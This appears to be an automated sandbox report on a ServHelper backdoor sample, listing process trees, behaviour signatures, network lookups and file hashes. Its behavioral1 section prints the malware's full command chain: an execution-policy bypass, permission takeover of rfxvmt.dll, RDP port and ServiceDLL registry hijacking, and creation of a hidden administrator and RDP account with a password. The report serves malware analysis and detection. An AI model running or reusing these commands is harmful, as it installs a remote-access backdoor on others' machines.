PID 2444 wrote to memory of 3548 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2444 wrote to memory of 3548 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\blowfish.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\blowfish.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3548 -ip 3548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 612

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp

Files

memory/3548-0-0x0000000000400000-0x000000000040C000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-04-10 10:03

Reported

2024-04-10 10:05

Platform

win7-20240319-en

Max time kernel

122s

Max time network

135s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsUnzip.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1376 wrote to memory of 1192 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1376 wrote to memory of 1192 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1376 wrote to memory of 1192 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1376 wrote to memory of 1192 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1376 wrote to memory of 1192 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1376 wrote to memory of 1192 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1376 wrote to memory of 1192 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1192 wrote to memory of 2276 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe
PID 1192 wrote to memory of 2276 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe
PID 1192 wrote to memory of 2276 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe
PID 1192 wrote to memory of 2276 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsUnzip.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsUnzip.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1192 -s 228

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-10 10:03

Reported

2024-04-10 10:05

Platform

win7-20231129-en

Max time kernel

125s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets DLL path for service in the registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" C:\Windows\system32\reg.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3028 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe C:\Windows\System32\cmd.exe
PID 3028 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe C:\Windows\System32\cmd.exe
PID 3028 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe C:\Windows\System32\cmd.exe
PID 3028 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe C:\Windows\System32\cmd.exe
PID 3052 wrote to memory of 2816 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 3052 wrote to memory of 2816 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 3052 wrote to memory of 2816 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 3052 wrote to memory of 1780 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 1780 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 1780 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1780 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1780 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1780 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1780 wrote to memory of 2376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 2376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 2376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 320 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 320 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 320 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 1832 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 1832 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 1832 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 1984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 1984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 1984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 1856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 1856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 1856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 2852 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 2852 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 2852 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 2728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 2728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 2728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1780 wrote to memory of 2824 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1780 wrote to memory of 2824 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1780 wrote to memory of 2824 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1780 wrote to memory of 1868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1780 wrote to memory of 1868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1780 wrote to memory of 1868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1780 wrote to memory of 1584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1780 wrote to memory of 1584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1780 wrote to memory of 1584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1780 wrote to memory of 2568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1780 wrote to memory of 2568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1780 wrote to memory of 2568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 2568 wrote to memory of 2040 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2568 wrote to memory of 2040 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2568 wrote to memory of 2040 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1780 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1780 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1780 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1068 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1068 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1068 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 324 wrote to memory of 596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 324 wrote to memory of 596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 324 wrote to memory of 596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 596 wrote to memory of 604 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 596 wrote to memory of 604 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 596 wrote to memory of 604 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1780 wrote to memory of 540 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1780 wrote to memory of 540 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1780 wrote to memory of 540 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe

"C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout -t 15& powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\evil.ps1

C:\Windows\system32\timeout.exe

timeout -t 15

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\evil.ps1

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc Ghasar4f5 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc B067akwa /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc B067akwa /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc B067akwa /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" SCFGBRBT$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" SCFGBRBT$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" SCFGBRBT$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc B067akwa

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc B067akwa

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc B067akwa

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 dfsrakizimoy34ggf.xyz udp

Files

C:\Users\Admin\AppData\Local\Temp\nsd7DE.tmp\blowfish.dll

MD5 5afd4a9b7e69e7c6e312b2ce4040394a
SHA1 fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256 053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512 f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

\Users\Admin\AppData\Local\Temp\nsd7DE.tmp\System.dll

MD5 fbe295e5a1acfbd0a6271898f885fe6a
SHA1 d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256 a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA512 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

\Users\Admin\AppData\Local\Temp\nsd7DE.tmp\nsUnzip.dll

MD5 77a26c23948070dc012bba65e7f390aa
SHA1 7e112775770f9b3b24e2a238b5f7c66f8802e5d8
SHA256 4e4e429ecf1c49119a21c817899f64152b03b41b036fc1d92aee335043364c43
SHA512 2e7ffa4ed5c97f555e1b0d6f55ffcfd53cd28302fc77d95fdaea89e0b6b42e67e366331e52358e78e8266d079cc2ca3ea4c909197fb38a5b4c8151c7678d0065

memory/1780-43-0x000000001B5A0000-0x000000001B882000-memory.dmp

memory/1780-45-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

memory/1780-44-0x0000000002810000-0x0000000002818000-memory.dmp

memory/1780-46-0x00000000028B0000-0x0000000002930000-memory.dmp

memory/1780-47-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

memory/1780-48-0x00000000028B0000-0x0000000002930000-memory.dmp

memory/1780-49-0x00000000028B0000-0x0000000002930000-memory.dmp

memory/1780-50-0x00000000028B0000-0x0000000002930000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\evil.ps1

MD5 71378b4f0b781d534492988926cfb758
SHA1 db6c0e67a5b9a2932f071ee9e165658aa4950bf6
SHA256 1c88620ce8a15c57b1ca64da67cf995f1a3ce3aeef6087d90f6cff772fbf2614
SHA512 62f2475e7284ac7bf480edf5e60d6438e4aa4a8666a0d15694ba2e7ce7fb77629baed27c076f92720373251d97c6501a5ce21c91c7f0040d5fd4dfe92a9c45f4

memory/1780-54-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

memory/1780-53-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

memory/1780-69-0x00000000028B0000-0x0000000002930000-memory.dmp

memory/1780-70-0x00000000028B0000-0x0000000002930000-memory.dmp

memory/1780-71-0x00000000028B0000-0x0000000002930000-memory.dmp

\Windows\Branding\mediasrv.png

MD5 34c833d9f05fa3ff36ad6256164f8510
SHA1 7f50ab402b023f751af95869d1c7789c864f77fb
SHA256 af2f4f3f3a34bfe56243b2419d0d494c48fbb38502395fc9a726f27737e6a178
SHA512 284edfce8fc6b9bfbe74b770492f8a592a284851d8fa59044147eea80aaaec35f29a4c90a39a1bca89e59f46bd943483b64eedd843a9e23533c82cd768205b93

\Windows\Branding\mediasvc.png

MD5 d81ea89ae878fcfc33accae038a14016
SHA1 aafe059a73426ac3878724c9e713d58e8162ad3d
SHA256 978726f716f0b882d237e7120e0d6ae5ec69f0999e4dd5a5f24f152858d2ac00
SHA512 1568370943476b1bb1a45eb8631156bc53c973d77de2e560b1f66dd9223631d9504e6869e4311967a8aa87900b7bf0b39addc336ec02624403085991cec41d40

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\uninst.dat.log

MD5 0a9acbe50c9af249014e877216e99f4c
SHA1 f79c9d8a1442634f130ffb5359e3502829c5b92f
SHA256 8183b668099930ea6f5bbdba89e67057499a28766cd61cf630642e0dfb4e4047
SHA512 8e79f88ae39e1f741eee33e9c2f0cc595b120a5260ba96790f5a6b90a4ce4dc5ff9e576e56708393c215fdd54964a04ee498795a482194b3c59800ea49925a33

memory/1780-78-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-10 10:03

Reported

2024-04-10 10:05

Platform

win7-20240221-en

Max time kernel

121s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 552 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 552 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 552 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 552 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 552 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 552 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 552 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2200 wrote to memory of 1256 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe
PID 2200 wrote to memory of 1256 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe
PID 2200 wrote to memory of 1256 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe
PID 2200 wrote to memory of 1256 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 220

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-04-10 10:03

Reported

2024-04-10 10:05

Platform

win7-20240220-en

Max time kernel

140s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\blowfish.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3036 wrote to memory of 3044 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
